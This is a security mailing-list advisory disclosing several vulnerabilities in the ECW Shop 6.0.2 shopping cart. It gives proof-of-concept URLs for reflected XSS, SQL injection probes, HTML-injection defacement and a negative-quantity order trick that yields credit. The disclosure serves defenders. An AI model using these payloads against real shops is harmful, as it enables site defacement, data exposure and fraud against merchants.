<<< Date Index >>>     <<< Thread Index >>>

[NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities



Hello All,

I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2

Authors Site: http://www.soft4e.com/

ECW Shop is described by its authors as:

ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script
>

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+

HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma
x=1

[4]------------------------------------------------------------+

Cart/Order Manipulation:

You can add negative quanity value items to your cart to gain credit.

Example:

Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of
£6.99

Cart Total: £2.00

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE


JohnC@xxxxxxxxxxx

http://www.NoBytes.com